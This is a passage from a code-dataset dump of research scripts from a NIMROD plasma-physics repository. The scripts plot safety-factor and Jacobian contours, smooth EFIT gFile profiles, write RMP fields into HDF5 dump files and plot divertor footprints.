#plt.savefig('surfmn_comp_15000.png',bbox_inches='tight')\n plt.savefig('surfmn16.png',bbox_inches='tight')\n\nif plotFSArea==1:\n \n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho[fgfile],FSArea[1:256],color='r')\n ax.set_xlabel(r'$\\rho$')\n ax.set_ylabel(r'Flux Surface Area ${\\rm m^2}$')\n\nif plotqcompare==1:\n \n fig,ax=plt.subplots(figsize=(6,6))\n 
ax.plot(rho[fgfile],q1[1:256],color='r',label='Mine')\n ax.plot(rho[fgfile],qg[fgfile],color='b',label='Fluxgrid')\n ax.legend()\n ax.set_xlabel(r'$\\rho$')\n ax.set_ylabel(r'$q$')\n\nif plottheta==1:\n\n thmax=np.max(theta_str[1:,:])\n thmin=np.min(theta_str[1:,:])\n \n# if abs(thmax)>abs(thmin):\n# thmin=-thmax\n# else:\n# thmax=-thmin\n \n levels=np.arange(thmin,thmax,(thmax-thmin)/clines)\n \n fig,ax=plt.subplots()\n \n CS = ax.contourf(R[files[0]],Z[files[0]],theta_str,clines,cmap=cm.nipy_spectral)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_aspect('equal')\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$\\Theta$',fontsize=24)\n\n ax.set_xlabel(r'$R\\,{\\rm (m)}$',fontsize=24)\n ax.set_ylabel(r'$Z\\,{\\rm (m)}$',fontsize=24)\n\n plt.savefig('Theta_straight.png',bbox_inches='tight')\n\n\nif plotjac==1:\n pr_max = np.max(jac)\n pr_min = np.min(jac)\n \n #if abs(pr_max)>abs(pr_min):\n # pr_min=-pr_max\n #else:\n # pr_max=-pr_min\n \n lev,delta=np.linspace(pr_min,pr_max,clines,retstep=True) \n \n fig,ax=plt.subplots(figsize=(5,6)) \n CS=ax.contourf(R[files[0]],Z[files[0]],jac,levels=lev,cmap=cm.gnuplot2)\n \n ax.set_aspect('equal')\n \n plt.setp(ax.get_xticklabels(), fontsize=18)\n plt.setp(ax.get_yticklabels(), fontsize=18)\n #plt.setp(ax.get_yticklabels(), fontsize=12)\n #ax.set_xlabel('$\\sqrt{\\psi} $',fontsize=30)\n #ax.set_ylabel('$q $',fontsize=30,rotation='horizontal')\n ax.set_title(r'Jacobian',fontsize=22)\n ax.set_xlabel(r'$R\\,{\\rm(m)}$',fontsize=20)\n ax.set_ylabel(r'$ Z\\,{\\rm(m)}$',fontsize=20)\n #cbar=plt.colorbar(CS,pad=0.01,format=\"%0.000f\")\n cbar=plt.colorbar(CS,pad=0.01)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=18)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(16)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n \n plt.savefig('xy_jac_00000.png',bbox_inches='tight') \n\nif plotqcon==1:\n\n qcon=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\n\n for i in range(len(qcon)):\n for j in range(len(qcon[0])):\n qcon[i,j]=q1[i]\n\n pr_max = np.max(qcon)\n pr_min = np.min(qcon)\n \n #if abs(pr_max)>abs(pr_min):\n # pr_min=-pr_max\n #else:\n # pr_max=-pr_min\n \n lev,delta=np.linspace(pr_min,pr_max,clines,retstep=True)\n \n qlev=np.array([-4,-3,-2]) \n \n fig,ax=plt.subplots(figsize=(5,6)) \n CS=ax.contourf(R[files[0]],Z[files[0]],qcon,levels=lev,cmap=cm.gnuplot2)\n \n QS=ax.contour(R[files[0]],Z[files[0]],qcon,levels=qlev,colors='k',linestyles='solid')\n \n fmt = {}\n strs=[r'$q=\\!-4$',r'$q=\\!-3$',r'$q=\\!-2$']\n for l, s in zip(QS.levels, strs):\n fmt[l] = s\n \n manual_locations=[(1.36,0.85),(1.42,0.73),(1.48,0.59)]\n \n ax.clabel(QS,qlev,inline=1,fmt=fmt,manual=manual_locations,inline_spacing=15)\n \n ax.set_aspect('equal')\n \n plt.setp(ax.get_xticklabels(), fontsize=18)\n plt.setp(ax.get_yticklabels(), fontsize=18)\n #plt.setp(ax.get_yticklabels(), fontsize=12)\n #ax.set_xlabel('$\\sqrt{\\psi} $',fontsize=30)\n #ax.set_ylabel('$q $',fontsize=30,rotation='horizontal')\n ax.set_title(r'Safety Factor',fontsize=22)\n ax.set_xlabel(r'${\\rm R\\,(m)}$',fontsize=20)\n ax.set_ylabel(r'${\\rm Z\\,(m)}$',fontsize=20)\n 
#cbar=plt.colorbar(CS,pad=0.01,format=\"%0.000f\")\n cbar=plt.colorbar(CS,pad=0.01)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=18)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(16)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n \n plt.savefig('xy_q_00000.png',bbox_inches='tight') \n\nplt.show()" }, { "alpha_fraction": 0.610947847366333, "alphanum_fraction": 0.6401543021202087, "avg_line_length": 31.011764526367188, "blob_id": "ae0f55adb4e465d51e34019c27906a010cf012b5", "content_id": "d8c4e4e49365a816761c6d67f82c35bde44fc180", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5444, "license_type": "no_license", "max_line_length": 124, "num_lines": 170, "path": "/diiidNim/gFileClean.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\n''' This file reads an gFile, allows the user to modify the F and p profiles,\n and then writes a new gFile. This is useful for cleaning up the profiles \n near the axis.\n'''\n\nimport os\nimport datetime \nimport numpy as np\nimport numpy as np\nfrom scipy.interpolate import splev,splrep\nimport matplotlib.pyplot as plt\n\n\ndef readWriteEfitHeader(read_file, write_file):\n '''This function reads are writes the EFIT File Header \n and returns the mesh mx and my''' \n this_line = f.readline()\n this_words = this_line.split()\n efit_id = this_words[0]\n today = datetime.date.today().strftime(\"%m/%d/%Y\") \n shot_num = this_words[2]\n recon_time = this_words[3]\n no_clue = int(this_words[4])\n mx = int(this_words[5])\n my = int(this_words[6])\n header = \" {0:<9s}{1:<14s}{2:<9s}{3:<17s}{4:<2d}{5:<4d}{6:<4d}\\n\".format(efit_id,today,shot_num,recon_time,no_clue,mx,my)\n write_file.write(header)\n for ii in range(4):\n this_line = f.readline()\n write_file.write(this_line)\n return mx, my\n\ndef readWriteRestFile(read_file,write_file):\n while True:\n this_line=f.readline()\n if (len(this_line)==0): break\n write_file.write(this_line)\n\ndef readProfile(read_file, ma):\n profile = np.zeros(ma)\n floats_per_line = 5\n lines = ma // floats_per_line\n float_length=16\n for ii in range(0,lines):\n this_line = f.readline()\n for jj in range(0,floats_per_line):\n profile[ii*floats_per_line + jj] = float(this_line[jj*16:(jj+1)*16])\n this_line = f.readline()\n ii = lines\n for jj in range(0, ma % floats_per_line):\n profile[ii*floats_per_line + jj] = float(this_line[jj*16:(jj+1)*16])\n return profile\n\ndef writeProfile(write_file, profile):\n floats_per_line = 5 \n float_length=16\n for ii in range(profile.size//floats_per_line):\n this_line=''\n for jj in range(floats_per_line):\n this_line += '{: 16.9E}'.format(profile[ii*floats_per_line+jj])\n write_file.write(this_line+'\\n')\n this_line=''\n ii = profile.size//floats_per_line\n for jj in range(0, profile.size % floats_per_line):\n this_line += '{: 16.9E}'.format(profile[ii*floats_per_line+jj])\n write_file.write(this_line+'\\n')\n\n\nclass modField:\n def __init__ (self, mode, psi_1, fit_args):\n self.mode = mode\n self.psi_1 = psi_1\n self.fit_args = fit_args\n def quadFit(self, value_1, dvalue_1):\n ''' Fit a quadratic function from psi=0 to psi_i to the profile\n\n The first constraint is psi_1 is continuious. This first argument\n determines which other constraints are used. 
The options are\n 0: profile at psi_0 and derivative at psi = 0\n 1: profile at psi_0 and derivative at psi_1\n 2: derivative at psi=0 and psi_1\n Second argument is the first constraint \n profile at 0 for fit_args[0]= 0,1\n derivative at 0 for fit_args[0] = 2\n Third argument is the second constraint in needed\n '''\n if self.fit_args[0]==0:\n self.quadC = self.fit_args[1]\n self.quadB = self.fit_args[2]\n self.quadA = (value_1-self.quadB * self.psi_1 - self.quadC)/(self.psi_1**2)\n elif self.fit_args[0]==1:\n self.quadC = self.fit_args[1]\n self.quadA = (dvalue_1 * self.psi_1 +self.quadC - value_1)/self.psi_1**2\n self.quadB = dvalue_1 - 2.0 * self.quadA * self.psi_1\n elif self.fit_args[0]==2:\n # do something\n print(\"Todo\")\n else:\n raise ValueError(\"Mode not defined for quad fit\")\n def quadEval(self, psi):\n return self.quadA * psi**2 + self.quadB * psi + self.quadC\n def smooth (self, psi, field):\n ''' This function smooths a field field'''\n splineField = splrep(psi,field,k=3)\n field_psi_1 = splev(self.psi_1,splineField)\n dField_psi_1 = splev(self.psi_1,splineField,der=1)\n if self.mode==\"quad\":\n self.quadFit(field_psi_1,dField_psi_1)\n\n tempField = np.zeros(field.size)\n for ix, ipsi in enumerate(psi):\n if (ipsi < self.psi_1):\n if self.mode==\"quad\":\n tempField[ix] = self.quadEval(ipsi)\n else:\n tempField[ix] = field[ix]\n\n newSplineField = splrep(psi,tempField[:],k=3)\n\n# plot fields\n x2 = np.linspace(0, 1, 200)\n y2 = splev(x2, splineField)\n y3 = splev(x2, newSplineField)\n plt.plot(x2, y2, x2, y3)\n plt.show()\n \n return tempField\n\n\n\nhome_dir = os.environ['HOME']\nscratch_dir = \"/SCRATCH\"\nlocal_dir = \"/174446_novac_debug/eq21\"\ngfile = \"g174446.03390\"\nnew_gfile = gfile + \".mod3\"\nfull_read_file = home_dir + scratch_dir + local_dir +\"/\"+ gfile\nfull_write_file = home_dir + scratch_dir + local_dir +\"/\"+ new_gfile\n\nsmooth_f = True\nnew_f_profile = modField(\"quad\", 0.1, (1, -3.479))\nsmooth_p = True\nnew_p_profile = modField(\"quad\", 0.1, (0, 86000., 0.0))\n\nwith open(full_read_file) as f:\n with open(full_write_file,'w') as out_file:\n mx, my = readWriteEfitHeader(f, out_file)\n print(mx,my)\n \n psi = np.zeros(mx)\n for ii in range(mx):\n psi[ii]= ii/(mx-1)\n f_profile = readProfile(f,mx)\n p_profile = readProfile(f,mx)\n q_profile = readProfile(f,mx)\n m_profile = readProfile(f,mx)\n if smooth_f:\n f_profile = new_f_profile.smooth(psi,f_profile)\n if smooth_p:\n p_profile = new_p_profile.smooth(psi,p_profile)\n\n\n writeProfile(out_file,f_profile)\n writeProfile(out_file,p_profile)\n writeProfile(out_file,q_profile)\n writeProfile(out_file,m_profile)\n readWriteRestFile(f,out_file)\n\n# with(full_write_file,'w') as out_file:\n# read the file header\n\n\n" }, { "alpha_fraction": 0.5325829386711121, "alphanum_fraction": 0.5568720102310181, "avg_line_length": 34.9361686706543, "blob_id": "d315dfa1af9eef36acd63e52e3117e31e576da4a", "content_id": "f796a0458dcf7ed71f13bc6ee6b847bcb59c6a97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1688, "license_type": "no_license", "max_line_length": 78, "num_lines": 47, "path": "/nimflSeed/startPosClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' Base class for generating start position data '''\nimport numpy as np\nimport random as ran\n\nclass startPosClass:\n numPoints=-1\n randomPhi = False\n phiPlane = 0.0\n rzp = np.zeros([1,3])\n geom = \"none\"\n def __init__ 
(self,numPoints,geom,randomPhi,phiPlane):\n ''' Initialize start position class '''\n self.numPoints = numPoints\n self.geom = geom\n self.randomPhi = randomPhi\n self.phiPlane = phiPlane\n self.rzp = np.zeros([self.numPoints,3])\n if (not self.randomPhi):\n self.rzp[:,2]=self.phiPlane\n def d3dlowerRZPhi(self):\n ''' generate a collection of rzp points for the lower d3d divertor '''\n for ii in range(self.numPoints):\n top=1\n bottom= -1.2\n left=1.2\n right=2.3\n self.rzp[ii,0]=ran.uniform(left,right)\n self.rzp[ii,1]=ran.uniform(bottom,top)\n if self.randomPhi:\n self.rzp[ii,2] = ran.uniform(0,2*np.pi)\n def calculateRZPhi(self):\n if self.geom=='d3dlower':\n self.d3dlowerRZPhi()\n elif self.geom=='d3d':\n print(\"d3d geom\")\n else: # do nothing\n print(\"Geom: \", geom, \" not reconized\")\n def writeStartPos(self,fileName):\n thisFile = open(fileName,'w')\n thisFile.write(str(self.numPoints)+\"\\n\")\n for jj in range(self.numPoints):\n thisLine = '{: 16.16e}'.format(self.rzp[jj,0]) + \", \" \n thisLine+= '{: 16.16e}'.format(self.rzp[jj,1]) + \", \" \n thisLine+= '{: 16.16e}'.format(self.rzp[jj,2]) + \"\\n\" \n thisFile.write(thisLine)\n thisFile.close()" }, { "alpha_fraction": 0.713302731513977, "alphanum_fraction": 0.718654453754425, "avg_line_length": 30.16666603088379, "blob_id": "008617e286426f341d5f3f4d69a6fd81b47191d1", "content_id": "8cd420bb0a1ce3061b5ce162ce267166174afcbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1308, "license_type": "no_license", "max_line_length": 73, "num_lines": 42, "path": "/biotSavart/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# biotSavart\nThese scripts calculate the edge magnetic field from external rmp coils\nby integrating the Biot Savart law \n\n## Inputs:\n - Coil specification\n - Coil currents\n - NIMROD boundary node locations\n\n## Outputs:\n - Edge magnetic field decomposed by toroidal mode\n\n## Classes:\n - A generic coil class\n - Specific ways to specify C-coil and I-coil like perturbations\n - Biot-Savart Integrator\n\n## Key Steps:\n - Read in node locations and generate a list of r' points\n - Generate coils\n - Integrate Biot-Savart Equation\n - FFT B-Field to get Fourier decomposition\n - Write bmn file\n\n## Status: \n - Can setup simple circular coils\n - ODE integrator up and running\n - Tested with circular coil and point at the center of coil\n - Simple test of C coil with n=0 and n=1 pert at 0,0,0\n - Code runs, n=1 c coil fields look reasonable\n - Much of the functionality needs to be moved to functions, to clean up\n\n## Todo:\n - [x] Read node locations at generate r' points\n - [x] Write coil class\n - [x] Write initialization for circular coils\n - [x] Write initialization for C-coils \n - [ ] Write initialization for I-coils\n - [x] Write Biot-Savart Integrator\n - [x] Test integrator for planar coils\n - [x] Write FFT and write functionality (can copy lots from trip2NIM)\n - [ ] Plot coils" }, { "alpha_fraction": 0.7808641791343689, "alphanum_fraction": 0.7808641791343689, "avg_line_length": 34.77777862548828, "blob_id": "3ad99697b44ca61fe47a25adf6f671d99631df20", "content_id": "311ae9f1b38beb1a8de46b1b1c2d96391266562b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 324, "license_type": "no_license", "max_line_length": 77, "num_lines": 9, "path": "/surfmn/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# 
surfmnScan\n\nA utility for analyzing a bunch of surfmn plots and making pretty pictures\n\nTo start I will want to look over a bunch of directors in the present working\ndirectory, plot the data, get the time step, and find psi at the rational \nsurface.\n\nIn the future I might tie this into nimpy and do the surfmn analysis\n\n\n" }, { "alpha_fraction": 0.5892265439033508, "alphanum_fraction": 0.6227900385856628, "avg_line_length": 28.5510196685791, "blob_id": "279bcd90e3f7707bfd308eff5272146e5f6a2e3e", "content_id": "493a168119d4fce551eed4c27ce020a68fce4407", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7240, "license_type": "no_license", "max_line_length": 95, "num_lines": 245, "path": "/trip2Nim/writeRmpToDump.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n# This script writes rmp data stored in brmpn##.dat file to a brmp fields in\n# the NIMROD dumpfile.\n#\n# Input files:\n# dumpFile - nimrod hdf5 dump file, this file will be modified\n# brmp##.dat - dat files storing the rmp fields at the nimrod boudnary\n# Ouput file:\n# dumpFile -hdf5 dump file\n\n#to do list...\n#script inputs -dump file, brmpfile directory, flag to add rmp to be, optional n-list\n\n#read brmp files\n#check for keff capibility\n#\nimport h5py\nimport numpy as np\n\ndef getBlockKey(bl):\n '''Return block key string corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<1):\n print(\"bl must be in [1,9999]\")\n raise ValueError\n return f'{bl:04d}'\n\ndef getSeamKey(bl):\n '''Return seam key string corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<0):\n print(\"bl must be in [0,9999]\")\n raise ValueError\n return f'{bl:04d}'\n\ndef getBeKeys(bl):\n '''Return Be keys strings corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<1):\n print(\"bl must be in [1,9999]\")\n raise ValueError\n reKey='rebe'+f'{bl:04d}'\n imKey='imbe'+f'{bl:04d}'\n return reKey,imKey\n\ndef getBrmpKeys(bl):\n '''Return Brmp keys strings corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<1):\n print(\"bl must be in [1,9999]\")\n raise ValueError\n reKey='rebrmp'+f'{bl:04d}'\n imKey='imbrmp'+f'{bl:04d}'\n return reKey,imKey\n\ndef getRzedgeKey(bl):\n '''Return rzedge key string corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<1):\n print(\"bl must be in [1,9999]\")\n raise ValueError\n reKey='rzedge'+f'{bl:04d}'\n return reKey\n\ndef readBrmp(nn,fdir='',prefix='brmpn',suffix='.dat'):\n '''reads brmp file and returns an brmp as a np array'''\n if not (isinstance(nn,(int,np.integer)) ):\n raise TypeError\n elif (nn<0):\n print(\"nn must be zero or positive\")\n raise ValueError\n brmpFile=fdir+prefix+f'{nn:02d}'+suffix\n try:\n tempData=np.genfromtxt(brmpFile,delimiter=',')\n #second index of tempData should have 6 values\n #Each corresponding or Re or Im of each vector component of Bn\n if not (tempData.shape[1]==6):\n print(f'Data in {brmpFile} has wrong dimensions')\n raise ValueError\n brmp = np.zeros([tempData.shape[0],3],dtype=np.complex128)\n for ii in range(tempData.shape[0]):\n brmp[ii,0]=tempData[ii,0]+tempData[ii,1]*1.0j\n 
brmp[ii,1]=tempData[ii,2]+tempData[ii,3]*1.0j\n brmp[ii,2]=tempData[ii,4]+tempData[ii,5]*1.0j\n except OSError:\n print(f'{brmpFile} not found')\n raise\n return brmp\n\n\ndef writeBrmp(dumpFile,nList=[],hardFail=False):\n '''Main driver function to write Brmp to dump file'''\n with h5py.File(dumpFile, 'r+') as h5DumpFile:\n #get list of nmodes\n nmodeDict = {}\n fillList=False\n if not nList:\n fillList=True\n for ii, nn in enumerate(h5DumpFile['keff']):\n nmodeDict[int(nn)]=ii\n if fillList:\n nList.append(int(nn))\n #analyze mesh need to check if mesh is a polar mesh and find nybl\n polarMesh=True\n nybl=0\n seam0=h5DumpFile['seams'][getSeamKey(0)]\n edgeBlock=set()\n for vertex in seam0['vertex']:\n edgeBlock.add(vertex[0])\n nybl=len(edgeBlock)\n #search for corners, if found we know mesh is not polar\n for excorner in seam0['excorner']:\n if (excorner):\n polarMesh=False\n break\n if not polarMesh:\n raise Exception(\"Mesh in dumpfile is not a polar mesh.\")\n #loop over nList and modify Brmp\n for nn in nList:\n if not nn in nmodeDict:\n print(f'Warning {nn} is not a Fourier mode in {dumpFile}')\n if hardFail:\n raise ValueError\n else:\n continue\n try:\n brmp=readBrmp(nn)\n nIndex=nmodeDict[nn]\n print(nIndex)\n except OSError:\n if hardFail:\n raise\n else:\n print(\"Continuing with next foruier mode\")\n except:\n raise\n print(nmodeDict)\n print(nList)\n\nif __name__ == \"__main__\":\n dumpFile = \"/home/ehowell/SCRATCH/166439/03300_fgnimeq_q104_reorder_normp/dumpgll.00000.h5\"\n writeBrmp(dumpFile,nList=[15],hardFail=True)\n\n\n\n\n#exit()\ndumpFile = \"/home/ehowell/SCRATCH/166439/03300_fgnimeq_q104_reorder_test/dumpgll.00000.h5\"\nh5DumpFile = h5py.File(dumpFile, 'r') #h5instance of dumpfile r+ for read/write\n\n#file structure\n# h5dump.keys = dumpTime, keff, rblocks, seams\nfor key in h5DumpFile.attrs.items():\n print(key)\nfor key in h5DumpFile['dumpTime'].attrs:\n print(key)\nprint(h5DumpFile['dumpTime'].attrs.get('vsTime'))\nprint(h5DumpFile['dumpTime'])\n#get list of nmodes\nnmodeList = []\nfor ii in h5DumpFile['keff']:\n nmodeList.append(int(ii))\n\n#get list of external vertices from seam0\n#seam zero has 3 keys, np, vertex, and excorner\n#vertex has a list of block and vertex id\n#vertex indicate how many vertex share an exterior vertex\n#excorner is a flag to indicate vertex is a corner\nseam0=h5DumpFile['seams'][getSeamKey(0)]\nh5np=list(seam0['np'])\nprint(h5np)\nedgeBlock=set()\nfor key in seam0:\n print(key)\nfor vertex in seam0['vertex']:\n edgeBlock.add(vertex[0])\nprint(edgeBlock)\nprint(len(edgeBlock))\npolar=True\nfor excorner in seam0['excorner']:\n if (excorner):\n polar=False\n break\n print(excorner)\nprint(polar)\nseam1=h5DumpFile['seams'][getSeamKey(32)]\nfor key in seam1:\n print(key)\nfor ii in seam1['intxy']:\n print(ii)\nexit()\nvertex=list(seam0['vertex'])\nprint(vertex)\nprint(vertex[0][0])\nsum=0\nfor block, node in vertex:\n sum+=1\n print(block,node)\n print(h5DumpFile['rblocks'][getBlockKey(block)][getBrmpKeys(block)[0]][node])\n print(h5DumpFile['rblocks'][getBlockKey(block)][getBrmpKeys(block)[1]][node])\nprint(sum)\nexit()\n\nfor key in h5DumpFile['seams']['0032']:\n print(key)\nfor ii in h5DumpFile['seams']['0032']['intxy']:\n print(ii)\nfor key in h5DumpFile['rblocks']['0032']:\n print(key)\nprint(h5DumpFile['rblocks']['0032']['rz0032'])\nprint(getBrmpKeys(32))\nprint(h5DumpFile['rblocks']['0032'][getRzedgeKey(32)])\nfor ii in h5DumpFile['rblocks']['0032'][getBrmpKeys(32)[0]]:\n print(ii)\nexit()\nfor key in h5DumpFile.keys():\n 
print(key)\n\nfor keff in h5DumpFile['keff']:\n print(keff)\n\nfor rblock in h5DumpFile['rblocks']:\n print(rblock)\n\nfor seams in h5DumpFile['seams']:\n print(seams)\n\nseam0=h5DumpFile['seams']['0000']\nfor key in seam0:\n print(key)\n\nsum=0\nfor ii in seam0['np']:\n print(ii)\n sum+=ii\n\nprint(sum)\nfor ii in seam0['vertex']:\n print(ii)\n" }, { "alpha_fraction": 0.5425214171409607, "alphanum_fraction": 0.6458872556686401, "avg_line_length": 30.381250381469727, "blob_id": "5d29f91040381c883f626a8f66c5175ca18752cd", "content_id": "4735ecc8572092c62c161a3c682769a9d7ea0a93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5021, "license_type": "no_license", "max_line_length": 141, "num_lines": 160, "path": "/plotingScripts/footPointPlot.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script reads a surfcross.txt file and plots the magnetic footpoint'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nimport os\n\ndef rzToS(r,z):\n tol=1e-4\n r1=1.016\n z1=-1.223\n r2=1.153\n z2=-1.363\n r3=1.372\n z3=-1.363\n r4=1.372\n r5=1.682\n z4=-1.25\n m2=(z2-z1)/(r2-r1)\n b2=z1-m2*r1\n l2 =m.sqrt((z2-z1)**2 +(r2-r1)**2)\n if ( (abs(r-r1)<tol) and (z>=z1)):\n '''on the first segment'''\n s=0-z\n elif (abs(z-m2*r-b2)<tol):\n# print ('slant')\n s=-z1 + m.sqrt((z-z1)**2+(r-r1)**2)\n elif ((abs(z-z3)<tol) and (r>r2-tol) and (r<r3+tol)):\n # print('bottom')\n s=-z1+l2+(r-r2)\n elif((abs(z-z4)<tol) and (r>r4-tol) and (r<r5+tol)):\n s=-z1+l2+(r3-r2)+(r-r4)\n else:\n print(\"bad point\")\n s=100\n #print(r,z,s)\n return s\n\ndef sortData(rawData,pssData):\n lastLine = -1\n numLines=0\n maxHits=1\n thisHits=0\n for ii in range(rawData.shape[0]):\n if rawData[ii,3]==lastLine:\n thisHits+=1\n if thisHits>maxHits:\n maxHits=thisHits\n else:\n lastLine=rawData[ii,3]\n numLines+=1\n thisHits=1\n# msg = \"This line \" + str(rawData[ii,3]) +\" thisHits: \" + str(thisHits)\n# print(msg)\n# print(numLines)\n# print(maxHits)\n prosData = np.zeros([numLines,maxHits,3])\n pssDict = {}\n# tempPss=np.zeros([int(np.amax(pssData[:,3])),2])\n \n lastLine = -1\n for ii in range(pssData.shape[0]):\n if int(pssData[ii,3])!=lastLine:\n lastLine=int(pssData[ii,3])\n pssDict[lastLine] = pssData[ii,2]\n\n# for physical data phi in [0,2pi] use a large phi to hide data from plot\n prosData[:,:,1]=1000.\n lastLine=-1\n lineIndex=-1\n hitIndex=-1\n for ii in range(rawData.shape[0]):\n if rawData[ii,3]==lastLine:\n hitIndex+=1\n else:\n lineIndex+=1\n hitIndex=0\n lastLine=rawData[ii,3]\n prosData[lineIndex,hitIndex,0]=rzToS(rawData[ii,0],rawData[ii,1])\n# prosData[lineIndex,hitIndex,1]=rawData[ii,2]*360/(2*np.pi)+180\n# prosData[lineIndex,hitIndex,1]=rawData[ii,2]*360/(2*np.pi)\n# Fix add 30 to be consistent\n prosData[lineIndex,hitIndex,1]=rawData[ii,2]*360/(2*np.pi)+30\n if prosData[lineIndex,hitIndex,1]>360:\n prosData[lineIndex,hitIndex,1]=prosData[lineIndex,hitIndex,1]-360\n prosData[lineIndex,hitIndex,2]=pssDict[lastLine]\n return prosData\n\nplasma_model = \"nonlinear\"\n \nhomeDir = os.environ['HOME']\nrelDir = \"/SCRATCH/166439/03300_vac_eq/normal_rmp_vac5_fpsep2/\"\nrelDir = \"/SCRATCH/166439/03300_2_equilbria/19091201_vac_lphi5_fp/\"\nrelDir = \"/SCRATCH/166439/03300_2_fl//19091702/lphi5_nolinear_restart/58000/\"\n#relDir = \"/SCRATCH/166439/03300_2_equilbria/19091702_fl/linear/lphi5_2/50000/\"\n#relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_rmp_cfl_b/\" +dump_num 
+\"/\"\n#relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_restart/\" +dump_num +\"/\"\n#relDir = \"/SCRATCH/166439/03300/normal_rmp_vac5_fpsep2/\"\n#relDir = \"/SCRATCH/166439/03300_vac_eq/complexconj_rmp_vac_fpsep2/\"\nfileName = \"surfcross0058000.txt\"\npssFileName = \"nimfl0058000.dat\"\n#fileName = \"surfcross0110000.txt\"\n#pssFileName = \"nimfl0110000.dat\"\n\n\nif plasma_model == \"vacuum\":\n plotTitle = \"Vacuum Response Footprint\"\n relDir = \"/SCRATCH/166439/03300_2_equilbria/19091201_vac_lphi5_fp_deg50/\"\n dump_num = \"00100\"\nelif plasma_model == \"linear\":\n plotTitle = \"Linear Response Footprint\"\n relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_rmp_cfl_b/200000_50deg/\"\n dump_num=\"200000\"\nelif plasma_model ==\"nonlinear\":\n plotTitle = \"Nonlinear Response Footprint\"\n relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_fresh/32000/\"\n dump_num = \"32000\"\nelse:\n plotTitle = \"Vacuum Response Footprint\"\n dump_num=\"58000\" \n\nif len(dump_num)==6:\n fileName = \"surfcross0\"+dump_num+\".txt\"\n pssFileName = \"nimfl0\"+dump_num+\".dat\"\nelif len(dump_num)==5:\n fileName = \"surfcross00\"+dump_num+\".txt\"\n pssFileName = \"nimfl00\"+dump_num+\".dat\"\n\n#fileName = \"surfcross0000100.txt\"\n#pssFileName = \"nimfl0000100.dat\"\nfullFileName = homeDir+relDir+fileName\npssFullFileName = homeDir+relDir+pssFileName\n\npltt0=0.\nplttf=360.\nplts0=1.15\npltsf=1.3\nminLength=70.\nvMax=1e5\nrawData = np.loadtxt(fullFileName)\npssData = np.loadtxt(pssFullFileName)\nprosData = sortData(rawData,pssData)\n\n\nfor ii in range(prosData.shape[0]):\n if prosData[ii,0,2]<minLength: continue\n plt.scatter(prosData[ii,:,1],prosData[ii,:,0],c=np.log10(prosData[ii,:,2]),cmap='prism',vmin=np.log10(minLength),vmax=np.log10(vMax),s=1)\nplt.vlines(80,plts0,pltsf,linestyles='dotted',linewidths=1)\nplt.hlines(1.285,0,360,linestyles='-.',linewidths=1)\nplt.text(150,1.2875, \"Inner strike point\",fontsize=12)\nplt.axis([pltt0,plttf,plts0,pltsf])\nplt.xlabel('Toroidal Angle (deg)')\nplt.ylabel('Distance along wall (m)')\nplt.title(plotTitle)\nplt.show()\n\n\n#print(prosData)\n#print(fullFileName)\n" }, { "alpha_fraction": 0.5067501664161682, "alphanum_fraction": 0.5130111575126648, "avg_line_length": 34.24827575683594, "blob_id": "88c0920e103ef3bbec56d1923b6caa1ef2f7b2e9", "content_id": "4bbf87b3aad17f496a1939972c3d9ff122bced30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5111, "license_type": "no_license", "max_line_length": 93, "num_lines": 145, "path": "/hocradic/hcMult.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#\nimport os\nimport h5py\nimport 